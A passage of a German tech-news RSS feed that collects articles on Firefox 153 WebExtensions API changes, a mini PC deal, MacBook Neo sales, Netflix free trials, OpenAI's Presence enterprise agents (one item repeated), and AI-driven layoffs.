        "turn on that setting, then reload the page.",
    });
    return false;
  }

  return true;
}</pre>
<p><span>devtools.inspectedWindow.eval()</span> calls targeting <span>file://</span> URLs are affected the same way; they now require this permission to succeed.</p>
<p>If your extension depends on <span>file://</span> access, expect existing users to see that access stops after upgrading (until they enable the permission), and consider adding a prompt or fallback path, for example by specifying an embedded options page (<span>options_ui</span>) and calling <span>browser.runtime.openOptionsPage()</span> to open <span>about:addons</span> and including instructions to toggle the setting in the “Permissions and data” tab.</p>
<h3><b>userScripts.execute() and publicSuffix: covered in our next post</b></h3>
<p>Firefox 153 adds two community-contributed APIs:</p>
<ul>
<li><span>userScripts.execute()</span>, which provides for one-off injection of one or more user script sources into a tab or frame, in a defined order, as a complement to the persistent, URL-pattern-based <span>userScripts.register()</span>.</li>
<li><span>publicSuffix</span>, which enables synchronous lookups against the browser’s built-in <a href="https://publicsuffix.org/">Public Suffix List</a> using <span>publicSuffix.isKnownSuffix()</span>, <span>publicSuffix.getKnownSuffix()</span>, and <span>publicSuffix.getDomain()</span>. This API means that extensions no longer need to bundle or maintain a suffix list to determine a hostname’s registrable domain (eTLD+1).</li>
</ul>
<p>Both APIs were built by contributors motivated by real needs in their extensions. We take an in-depth look at these contributions, their developers, impact, and history in a forthcoming post.</p>
<h3><b>documentId support across more APIs</b></h3>
<p>Firefox 153 introduces <span>documentId</span>, a stable identifier for a document instance, including a new <span>runtime.getDocumentId()</span> method, several <span>webNavigation</span> events and methods, <span>webRequest</span> events, scripting injection targets, and the extension messaging APIs.</p>
<p>Many WebExtension APIs use <span>tabId</span> and <span>frameId</span> to identify where to perform an operation. However, because <span>frameId</span> identifies the frame rather than its content, the loaded document can change and the extension’s subsequent operation ends up targeting the new (intended) document. <span>documentId</span> addresses this problem by providing a unique ID for the document. Now, if an extension uses the ID and the frame’s document has changed, the operation fails rather than silently targeting the wrong document.</p>
<p>See <a href="https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Work_with_documentId">Work with documentId</a> for the full list of supported events and methods, along with guidance on using it.</p>
<h3><b>Content scripts can read and modify adopted stylesheets</b></h3>
<p>Content scripts can now access <span>document.adoptedStyleSheets</span> and <span>ShadowRoot.adoptedStyleSheets</span> directly.</p>
<pre>const sheet = new CSSStyleSheet();
sheet.replaceSync("* { background: pink; }");
document.adoptedStyleSheets = [sheet];</pre>
<p>This enables extensions to inspect or modify constructed stylesheets from a content script, without using <span>.wrappedJSObject</span>, a workaround that risks interference from the web page.</p>
<h3><b>Theme manifest key: gradients in additional backgrounds</b></h3>
<p>The <span>theme</span> manifest key’s <span>images.additional_backgrounds</span> property now accepts CSS gradients alongside image URLs. A new <span>properties.additional_backgrounds_size</span> property controls the size of each additional background item.</p>
<h3><b>Contextual identities (containers)</b></h3>
<p>If your extension supports contextual identities, you now have access to two new methods: <span>contextualIdentities.getSupportedColors()</span> and <span>contextualIdentities.getSupportedIcons()</span>. These methods return the supported colors and icons, so your extension doesn’t need to hardcode either list.</p>
<p>Also, the colors have been updated to align with the new UI theme: <span>“turquoise”</span> is now <span>“cyan”</span>, <span>“toolbar”</span> is now <span>“gray”</span>, and <span>“violet”</span> has been added. The old names still work for backward compatibility, but your extension should switch to using <span>getSupportedColors()</span> rather than hardcoding either the old or new names.</p>
<h3><b>Add a build-for-amo script</b></h3>
<p>While this isn’t about new APIs, I wanted to mention a change that’s part of our work to make source code review faster and more reliable. When you submit an extension version, AMO now attempts to build your extensions from the submitted source code and compares the result to the package you uploaded. When the two match, reviewers don’t have to verify the build manually. This means submission can move through its review faster.</p>
<p>For now, this applies only if you submit source code that includes a <span>package.json</span> file to build your extension. If your extension has no build step, or you use a different build system, nothing changes. The AMO builder keeps its zero-config approach.</p>
<p>So, if your extension’s source code uses a <span>package.json</span> file, add an <a href="https://docs.npmjs.com/cli/v11/using-npm/scripts">npm script</a> named <span>build-for-amo</span> that runs the commands needed to build your extension for Firefox:</p>
<pre>{
  "scripts": {
    "fx-build": "some commands to build your add-on for Firefox",
    "build-for-amo": "npm run fx-build"
  }
}</pre>
<p>If you’ve a Firefox-specific build command, just point <span>build-for-amo</span> at it. When present, the builder invokes this script instead of guessing how to build your extension. And while you are at it, make sure all your dev dependencies are listed in the <span>package.json</span> file.</p>
<hr>
<p>For more information, including documentation and Bugzilla links, see the <a href="https://developer.mozilla.org/en-US/docs/Mozilla/Firefox/Releases/153#changes_for_add-on_developers">Changes for add-on developers</a> section of the Firefox 153 for developers release notes on MDN.</p>
<p>As always, file extension-related issues on <a href="https://bugzilla.mozilla.org/">Bugzilla</a> under the WebExtensions product, cross-browser API proposals are discussed in the <a href="https://github.com/w3c/webextensions">W3C WebExtensions Community Group</a>, and questions are welcome on the <a href="https://discourse.mozilla.org/c/add-ons/35">Add-ons Discourse</a>.</p>
<p> </p>
<p>The post <a href="https://blog.mozilla.org/addons/2026/07/23/firefox-153-webextensions-api-updates/">Firefox 153 WebExtensions API updates</a> appeared first on <a href="https://blog.mozilla.org/addons">Mozilla Add-ons Community Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA['Excellent' and 'exceptionally flexible': Geekom IT13 mini PC for small business users running office applications and video conferencing tools gets a welcome 10% price cut]]></title>
<description><![CDATA[Looking for a compact work PC? Geekom's "excellent" IT13 mini desktop gets a welcome 10% off at Amazon.]]></description>
<link>https://tsecurity.de/de/3689255/it-nachrichten/excellent-and-exceptionally-flexible-geekom-it13-mini-pc-for-small-business-users-running-office-applications-and-video-conferencing-tools-gets-a-welcome-10-price-cut/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689255/it-nachrichten/excellent-and-exceptionally-flexible-geekom-it13-mini-pc-for-small-business-users-running-office-applications-and-video-conferencing-tools-gets-a-welcome-10-price-cut/</guid>
<pubDate>Thu, 23 Jul 2026 16:03:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Looking for a compact work PC? Geekom's "excellent" IT13 mini desktop gets a welcome 10% off at Amazon.]]></content:encoded>
</item>
<item>
<title><![CDATA[MacBook Neo’s success wasn’t luck, it was a plan]]></title>
<description><![CDATA[It’s difficult to ignore the fact that Apple seems to have turned its MacBook Neo into a weapon to promote platform growth, with enough performance under the hood to make competitors seem inferior.



And even as the PC industry moves to try to compete with Apple’s last huge Mac success, the comp...]]></description>
<link>https://tsecurity.de/de/3689195/ai-nachrichten/macbook-neos-success-wasnt-luck-it-was-a-plan/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689195/ai-nachrichten/macbook-neos-success-wasnt-luck-it-was-a-plan/</guid>
<pubDate>Thu, 23 Jul 2026 15:22:56 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">It’s difficult to ignore the fact that Apple seems to have <a href="https://www.computerworld.com/article/4180406/after-a-quick-1-1m-sales-macbook-neo-set-to-reshape-the-pc-industry.html">turned its MacBook Neo into a weapon</a> to promote platform growth, with enough performance under the hood to make competitors seem inferior.</p>



<p class="wp-block-paragraph">And even as the PC industry moves to try to compete with Apple’s last <a href="https://www.applemust.com/macbook-neo-continues-to-top-amazon-laptop-charts-in-us-uk/" target="_blank" rel="noreferrer noopener">huge Mac success</a>, the company is already planning a powerful follow-up.</p>



<p class="wp-block-paragraph">That points to the discipline Apple has applied to the Mac since the introduction of Apple Silicon. The company has built a clear product roadmap, strong entry-level pricing, and steady performance gains. This focus is now paying dividends, giving people the impetus to keep placing their trust in Apple and its Macs — even as the industry raises prices in the face of RAMageddon and price increases. </p>



<h2 class="wp-block-heading"><strong>The numbers don’t lie</strong></h2>



<p class="wp-block-paragraph">“Apple’s recent price increase seems to be an inevitable response to these cost increases. In the second half of the year, other PC OEMs are expected to continue to raise prices, and the overall ASP increase is expected to continue,” Counterpoint said. The researcher tells us global PC shipments shrank 4% in the second quarter of 2026 as rising costs hit demand. The Mac maker, by contrast, moved in the opposite direction, generating 13% growth in the quarter — mainly on the back of the MacBook Neo introduction. </p>



<p class="wp-block-paragraph"><a href="https://www.idc.com/resource-center/press-releases/2q26-pc-top5/" target="_blank">Recent IDC data</a> gives Apple 10.1% year-over-year growth and just under 10% (9.9% to be exact) of the worldwide PC market, even as the overall market declined 4.9%.</p>



<p class="wp-block-paragraph">“With emerging supply chain and tariff challenges inflating memory prices…, Apple’s incredibly aggressive price-point for the MacBook Neo makes its release feel all the more like a gut punch to one of the PC market’s most valuable price tiers,” Futurum Research Director <a href="https://www.computerworld.com/article/4143010/apples-macbook-neo-first-reviews-and-analyst-reactions.html" data-type="link" data-id="https://www.computerworld.com/article/4143010/apples-macbook-neo-first-reviews-and-analyst-reactions.html">Olivier Blanchard said when the Neo was released</a>. </p>



<h2 class="wp-block-heading"><strong>Neo 2.0 is already coming</strong></h2>



<p class="wp-block-paragraph">In the immediate future, as competitors raise prices on the PCs that compete with Apple’s lower-cost device, Cupertino is <a href="https://www.culpium.com/p/apple-in-talks-to-boost-mac-neo-production" target="_blank" rel="noreferrer noopener">already plotting</a> the path toward <a href="https://www.bloomberg.com/news/articles/2026-07-22/apple-to-launch-new-macbook-air-imac-macbook-pro-neo-mac-mini-mac-studio" target="_blank" rel="noreferrer noopener">MacBook Neo 2.</a> Reports claim this will debut in March in new colors and use the A19 Pro chip from the iPhone 17 Pro, with performance boosted by slightly more unified memory (12GB, rather than 8GB). That’ll make it a much better Mac, likely with 10-15% performance gains and the ability to run Apple Intelligence, making it the best and most affordable AI PC in its class.</p>



<p class="wp-block-paragraph">Just four months after the Neo’s rollout, Apple is already in position to leak rumors of an even more computationally capable follow-up, while competitors struggle to compete with the original on performance, build quality, and price. Still, the Neo might get more expensive, reporting warns, with the lowest-price 256GB model now gone, making the $599 Mac a mirage we can only wistfully hope to see again. </p>



<p class="wp-block-paragraph">That might matter less in context, as PC makers everywhere boost prices while RAM, chips, and storage prices head north, along with transport, logistics, and energy costs. “While [Apple] did raise prices in line with the broader market, it still remains well positioned against rivals facing the same cost pressures,” said Jean Philippe Bouchard, vice president for consumer devices at IDC. </p>



<p class="wp-block-paragraph">“As market conditions continue to worsen, the importance of supply chain management and capabilities are increasingly important,” Bouchard said. “The largest vendors, with their buying power and long-standing supplier ties, are best positioned to take share from smaller rivals.”</p>



<h2 class="wp-block-heading"><strong>This was never about luck</strong></h2>



<p class="wp-block-paragraph">This isn’t solely a market take about competition, it’s about planning.</p>



<p class="wp-block-paragraph">Few in the industry seemed prepared for the massive memory price increases that hit this year. Apple clearly planned its low-cost Mac well before that happened, hoping to seize the PC market at the low-mid-range. This is precisely what it seems to have done, what it continues to do, and what it will continue to do.</p>



<p class="wp-block-paragraph">The recent reports that it has a successor planned shows the breadth of the Mac company’s strategic vision, as Apple has quite clearly sought to fully exploit the failings of Windows and the internal contradictions of a value-conscious industry in stiff competition with itself.</p>



<p class="wp-block-paragraph">With the first M-series Macs about to enter the replacement cycle, Apple has built a market it can capitalize on for at least a decade, meaning it already has a vision for PC sales that extends at least as far. That’s the kind of road map corporate purchasers want when they make platform deployment decisions, which is why Apple’s 10% share gains are the beginning of <a href="https://www.computerworld.com/article/4150717/hexnode-ceo-macbook-neo-forces-it-to-rethink-its-budget-laptop-strategy.html">even more significant market change</a>. </p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to my daily Apple-related news summaries at <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Netflix-Abo bis zu 30 Tage kostenlos bekommen: So geht’s]]></title>
<description><![CDATA[Ein Netflix-Abo hat mittlerweile so gut wie jeder, doch der eine oder andere wartet vielleicht noch auf eine Möglichkeit, das Streaming-Angebot kostenlos zu testen. Das war seit den Anfängen von Netflix nicht mehr möglich, doch jetzt gibt es wieder einen kostenlosen Probezeitraum.



Bis zu 30 Ta...]]></description>
<link>https://tsecurity.de/de/3689166/it-nachrichten/netflix-abo-bis-zu-30-tage-kostenlos-bekommen-so-gehts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689166/it-nachrichten/netflix-abo-bis-zu-30-tage-kostenlos-bekommen-so-gehts/</guid>
<pubDate>Thu, 23 Jul 2026 15:20:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ein Netflix-Abo hat mittlerweile so gut wie jeder, doch der eine oder andere wartet vielleicht noch auf eine Möglichkeit, das Streaming-Angebot kostenlos zu testen. Das war seit den Anfängen von Netflix nicht mehr möglich, doch jetzt gibt es wieder einen kostenlosen Probezeitraum.</p>



<p>Bis zu 30 Tage können Sie den Streamingtest jetzt kostenlos nutzen. Teilweise werden auch nur 14 Tage angeboten, der Gratis-Zeitraum scheint also je nach Standort oder genutztem Browser zu variieren. Auf der Webseite von <a href="https://www.netflix.com/de/" target="_blank" rel="noreferrer noopener">Netflix Deutschland</a> wurden uns auch nur 14 Tage für 0 Euro angezeigt. Es kann aber helfen, wenn Sie auf ein anderes Gerät wechseln oder Cookies löschen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6214ef2b56d"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/image_742287.png?w=1200" alt="" class="wp-image-3197988" width="1200" height="562" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure></div>



<p><strong>Wichtig:</strong> Das Angebot gilt explizit nur für Neukunden, nicht für wiederkehrende Abonnenten. Allerdings ist es recht einfach, diesen Umstand zu umgehen, wenn Sie sich einfach mit einer anderen E-Mail-Adresse als zuvor registrieren. Dann haben Sie zwar keinen Zugriff auf Ihren alten Account inklusive persönlicher Daten, Listen und Streaming-Historie, doch das ist sicher zu verschmerzen.</p>



<p>Nach Ablauf des Probezeitraums müssen Sie sich für ein Abo entscheiden (oder vorher kündigen). Zur Wahl stehen<strong> Standard mit Werbung</strong> für 4,99 Euro monatlich, <strong>Standard</strong> ohne Werbung für 13,99 Euro monatlich oder <strong>Premium</strong> für 19,99 Euro monatlich.<a href="https://karrierewelt.golem.de/products/ldap-identitatsmanagement-fundamentals-virtueller-drei-tage-workshop"></a></p>



<p>Warum genau Netflix gerade jetzt ein Probe-Abo wieder einführt, ist nicht ganz klar. Vermutlich versucht der Anbieter aber, neue Abonnenten dazu zu gewinnen, nachdem die Zahlen zuletzt stagnierten. Zwar ist Netflix der größte Anbieter für Streaming, doch die Konkurrenz schläft nicht. Seit Januar 2026 gibt es beispielsweise auch <a href="https://www.pcwelt.de/article/1186579/hbo-max-in-deutschland-sehen-so-gehts.html" target="_blank" rel="noreferrer noopener">HBO Max in Deutschland</a>, das mit großen Namen wie<em> Game of Thrones, House of the Dragon, Harry Potter </em>oder <em>Superman </em>wirbt<em>.</em></p>



<p><a href="https://www.pcwelt.de/article/1158913/streaming-vergleich-netflix-prime-video-disney-co.html" target="_blank" rel="noreferrer noopener">Eine Übersicht aller wichtigen Streaming-Dienste finden Sie hier</a>, inklusive Preisen, Vorteilen und Nachteilen.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Presence raises new questions about enterprise automation and jobs]]></title>
<description><![CDATA[OpenAI has launched Presence, an enterprise service for deploying voice and chat agents that can resolve customer and employee requests, potentially automating some work now handled by frontline support teams.



The agents can answer questions and operate IT systems, and enterprises can decide w...]]></description>
<link>https://tsecurity.de/de/3689165/it-nachrichten/openai-presence-raises-new-questions-about-enterprise-automation-and-jobs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689165/it-nachrichten/openai-presence-raises-new-questions-about-enterprise-automation-and-jobs/</guid>
<pubDate>Thu, 23 Jul 2026 15:20:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">OpenAI has launched Presence, an enterprise service for deploying voice and chat agents that can resolve customer and employee requests, potentially automating some work now handled by frontline support teams.</p>



<p class="wp-block-paragraph">The agents can answer questions and operate IT systems, and enterprises can decide what actions the agents may take and when they should seek human approval for actions or transfer a case to a human.</p>



<p class="wp-block-paragraph">OpenAI is already using Presence internally for its English-language phone support channel, where it verifies callers and uses account information to complete approved actions. The company said the system resolves 75% of inbound issues without human assistance.</p>



<p class="wp-block-paragraph">Another OpenAI service, Codex, can be used to monitor agents and suggest updates or improvements to processes. In OpenAI’s own tests, suggestions from Codex helped reduce handoffs to humans by 15 percentage points over 10 days, it said. Presence also includes simulation and evaluation tools that allow companies to test an agent before deployment. The tests assess whether it reaches the correct outcome, follows company policy, and hands a case to an employee when required.</p>



<p class="wp-block-paragraph">OpenAI intends each Presence deployment to deal with one kind of task, for example billing issues, insurance claims, or employee IT service requests, with agents getting only the knowledge and system access required for that task.</p>



<p class="wp-block-paragraph">Presence is not a self-service product: Enterprises will have to sign up for the limited availability program, with integration performed by OpenAI or selected <a href="https://www.computerworld.com/article/4136024/openai-partners-with-consulting-giants-to-deploy-enterprise-ai-agents.html">global systems integrators</a>.</p>



<p class="wp-block-paragraph">Companies exploring or testing Presence include Spanish bank BBVA, which is evaluating the service for everyday banking support in Mexico, and Japanese technology group SoftBank, which is using it in trials involving Japanese-language customer interactions. Australian insurer IAG is assessing whether the technology can help it respond to surges in customer demand during severe weather events.</p>



<h2 class="wp-block-heading">Workforce impact</h2>



<p class="wp-block-paragraph">OpenAI’s announcement did not address the potential effect of Presence on employment. But its claimed automation rate raises questions about how the technology could affect staffing in customer service and other support functions.</p>



<p class="wp-block-paragraph"><a href="https://pareekh.com/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, CEO of Pareekh Consulting, said CIOs should regard the 75% figure as evidence that the technology can work, rather than as a benchmark that every enterprise can expect to reach.</p>



<p class="wp-block-paragraph">Jain said OpenAI’s deployment benefits from being built around the company’s own products and data. Large enterprises may achieve lower automation rates because they must contend with fragmented legacy systems, uneven knowledge bases and more complex compliance demands.</p>



<p class="wp-block-paragraph">“Most organizations should expect lower initial automation levels that improve over time as the AI agent is refined,” Jain said.</p>



<p class="wp-block-paragraph">The first workforce effect is more likely to be <a href="https://www.cio.com/article/4015750/cios-see-ai-prompting-new-it-hiring-even-as-boards-push-for-job-cuts.html">slower hiring than immediate layoffs</a>, according to <a href="https://www.linkedin.com/in/tulikasheel/" target="_blank" rel="noreferrer noopener">Tulika Sheel</a>, senior vice president at Kadence International.</p>



<p class="wp-block-paragraph">“The roles most exposed are likely to be repetitive, high-volume functions such as frontline customer support and routine back-office processing,” Sheel said. “However, I would expect the first impact to be on hiring and team growth rather than immediate large-scale job cuts. Over time, enterprises may redesign roles around AI-assisted workflows, with humans focusing more on complex cases, escalation, and relationship management.”</p>



<p class="wp-block-paragraph">Jain said Tier-1 support agents handling predictable queries would face the most exposure. Broader reductions would become more likely only after companies reorganize their operations around the technology.</p>



<p class="wp-block-paragraph">However, <a href="https://omdia.tech.informa.com/authors/lian-jye-su" target="_blank" rel="noreferrer noopener">Lian Jye Su</a>, chief analyst at Omdia, said Presence is unlikely to increase the threat of job displacement because companies have used similar customer-support automation from vendors such as Genesys, NiCE, Five9 and AWS for years.</p>



<p class="wp-block-paragraph">Enterprises are more likely to use Presence alongside employees, with AI handling routine requests while people remain responsible for work requiring judgment and empathy, Su said.</p>



<h2 class="wp-block-heading">Cost and operational risks</h2>



<p class="wp-block-paragraph">Analysts said CIOs should examine whether Presence can maintain resolution quality as usage grows, since fewer human handoffs could leave employees dealing with a more difficult mix of cases.</p>



<p class="wp-block-paragraph">“The key question is not simply how many tasks AI can handle, but whether it can handle them reliably at scale,” Sheel said.</p>



<p class="wp-block-paragraph">The financial case will depend partly on the cost of connecting Presence to existing systems and maintaining the controls needed to govern its use, according to Jain. “Often the biggest cost of enterprise AI is not tokens but <a href="https://www.computerworld.com/article/4128310/openai-responds-to-claude-cowork-with-its-own-platform-to-help-build-deploy-and-manage-ai-agents.html">integration and governance</a>,” Jain added.</p>



<p class="wp-block-paragraph">Companies will need to determine what systems and data the agents can access, monitor their performance, and audit the actions they take. Those investments could offset early savings.</p>



<p class="wp-block-paragraph">Su said the complexity of enterprise IT will make it difficult for OpenAI to automate entire workflows on its own. Enterprises will still need to work with other technology providers and human employees, while CIOs will favor systems that can be audited and integrated with existing infrastructure.</p>



<p class="wp-block-paragraph">Jain said the economics could improve if companies use the same integrations and governance controls across additional workflows.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Presence raises new questions about enterprise automation and jobs]]></title>
<description><![CDATA[OpenAI has launched Presence, an enterprise service for deploying voice and chat agents that can resolve customer and employee requests, potentially automating some work now handled by frontline support teams.



The agents can answer questions and operate IT systems, and enterprises can decide w...]]></description>
<link>https://tsecurity.de/de/3689164/it-nachrichten/openai-presence-raises-new-questions-about-enterprise-automation-and-jobs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689164/it-nachrichten/openai-presence-raises-new-questions-about-enterprise-automation-and-jobs/</guid>
<pubDate>Thu, 23 Jul 2026 15:20:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">OpenAI has launched Presence, an enterprise service for deploying voice and chat agents that can resolve customer and employee requests, potentially automating some work now handled by frontline support teams.</p>



<p class="wp-block-paragraph">The agents can answer questions and operate IT systems, and enterprises can decide what actions the agents may take and when they should seek human approval for actions or transfer a case to a human.</p>



<p class="wp-block-paragraph">OpenAI is already using Presence internally for its English-language phone support channel, where it verifies callers and uses account information to complete approved actions. The company said the system resolves 75% of inbound issues without human assistance.</p>



<p class="wp-block-paragraph">Another OpenAI service, Codex, can be used to monitor agents and suggest updates or improvements to processes. In OpenAI’s own tests, suggestions from Codex helped reduce handoffs to humans by 15 percentage points over 10 days, it said. Presence also includes simulation and evaluation tools that allow companies to test an agent before deployment. The tests assess whether it reaches the correct outcome, follows company policy, and hands a case to an employee when required.</p>



<p class="wp-block-paragraph">OpenAI intends each Presence deployment to deal with one kind of task, for example billing issues, insurance claims, or employee IT service requests, with agents getting only the knowledge and system access required for that task.</p>



<p class="wp-block-paragraph">Presence is not a self-service product: Enterprises will have to sign up for the limited availability program, with integration performed by OpenAI or selected <a href="https://www.computerworld.com/article/4136024/openai-partners-with-consulting-giants-to-deploy-enterprise-ai-agents.html">global systems integrators</a>.</p>



<p class="wp-block-paragraph">Companies exploring or testing Presence include Spanish bank BBVA, which is evaluating the service for everyday banking support in Mexico, and Japanese technology group SoftBank, which is using it in trials involving Japanese-language customer interactions. Australian insurer IAG is assessing whether the technology can help it respond to surges in customer demand during severe weather events.</p>



<h2 class="wp-block-heading">Workforce impact</h2>



<p class="wp-block-paragraph">OpenAI’s announcement did not address the potential effect of Presence on employment. But its claimed automation rate raises questions about how the technology could affect staffing in customer service and other support functions.</p>



<p class="wp-block-paragraph"><a href="https://pareekh.com/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, CEO of Pareekh Consulting, said CIOs should regard the 75% figure as evidence that the technology can work, rather than as a benchmark that every enterprise can expect to reach.</p>



<p class="wp-block-paragraph">Jain said OpenAI’s deployment benefits from being built around the company’s own products and data. Large enterprises may achieve lower automation rates because they must contend with fragmented legacy systems, uneven knowledge bases and more complex compliance demands.</p>



<p class="wp-block-paragraph">“Most organizations should expect lower initial automation levels that improve over time as the AI agent is refined,” Jain said.</p>



<p class="wp-block-paragraph">The first workforce effect is more likely to be <a href="https://www.cio.com/article/4015750/cios-see-ai-prompting-new-it-hiring-even-as-boards-push-for-job-cuts.html">slower hiring than immediate layoffs</a>, according to <a href="https://www.linkedin.com/in/tulikasheel/" target="_blank" rel="noreferrer noopener">Tulika Sheel</a>, senior vice president at Kadence International.</p>



<p class="wp-block-paragraph">“The roles most exposed are likely to be repetitive, high-volume functions such as frontline customer support and routine back-office processing,” Sheel said. “However, I would expect the first impact to be on hiring and team growth rather than immediate large-scale job cuts. Over time, enterprises may redesign roles around AI-assisted workflows, with humans focusing more on complex cases, escalation, and relationship management.”</p>



<p class="wp-block-paragraph">Jain said Tier-1 support agents handling predictable queries would face the most exposure. Broader reductions would become more likely only after companies reorganize their operations around the technology.</p>



<p class="wp-block-paragraph">However, <a href="https://omdia.tech.informa.com/authors/lian-jye-su" target="_blank" rel="noreferrer noopener">Lian Jye Su</a>, chief analyst at Omdia, said Presence is unlikely to increase the threat of job displacement because companies have used similar customer-support automation from vendors such as Genesys, NiCE, Five9 and AWS for years.</p>



<p class="wp-block-paragraph">Enterprises are more likely to use Presence alongside employees, with AI handling routine requests while people remain responsible for work requiring judgment and empathy, Su said.</p>



<h2 class="wp-block-heading">Cost and operational risks</h2>



<p class="wp-block-paragraph">Analysts said CIOs should examine whether Presence can maintain resolution quality as usage grows, since fewer human handoffs could leave employees dealing with a more difficult mix of cases.</p>



<p class="wp-block-paragraph">“The key question is not simply how many tasks AI can handle, but whether it can handle them reliably at scale,” Sheel said.</p>



<p class="wp-block-paragraph">The financial case will depend partly on the cost of connecting Presence to existing systems and maintaining the controls needed to govern its use, according to Jain. “Often the biggest cost of enterprise AI is not tokens but <a href="https://www.computerworld.com/article/4128310/openai-responds-to-claude-cowork-with-its-own-platform-to-help-build-deploy-and-manage-ai-agents.html">integration and governance</a>,” Jain added.</p>



<p class="wp-block-paragraph">Companies will need to determine what systems and data the agents can access, monitor their performance, and audit the actions they take. Those investments could offset early savings.</p>



<p class="wp-block-paragraph">Su said the complexity of enterprise IT will make it difficult for OpenAI to automate entire workflows on its own. Enterprises will still need to work with other technology providers and human employees, while CIOs will favor systems that can be audited and integrated with existing infrastructure.</p>



<p class="wp-block-paragraph">Jain said the economics could improve if companies use the same integrations and governance controls across additional workflows.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.cio.com/article/4200684/openai-presence-raises-new-questions-about-enterprise-automation-and-jobs.html">CIO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to navigate the AI talent wars]]></title>
<description><![CDATA[Cloudflare recently beat Q1 2026 earnings. Revenue up 34% year over year. EPS ahead of consensus. Full-year guidance raised. Then, in the same breath, they announced 1,100 layoffs, 20% of the company. CEO Matthew Prince’s explanation: “The way we work at Cloudflare has fundamentally changed.”



...]]></description>
<link>https://tsecurity.de/de/3689121/it-nachrichten/how-to-navigate-the-ai-talent-wars/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689121/it-nachrichten/how-to-navigate-the-ai-talent-wars/</guid>
<pubDate>Thu, 23 Jul 2026 15:06:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph"><a href="https://finance.yahoo.com/markets/stocks/articles/cloudflare-net-q1-earnings-revenues-230528107.html">Cloudflare recently beat Q1 2026 earnings</a>. Revenue up 34% year over year. EPS ahead of consensus. Full-year guidance raised. Then, in the same breath, they announced 1,100 layoffs, 20% of the company. CEO Matthew Prince’s explanation: “The way we work at Cloudflare has fundamentally changed.”</p>



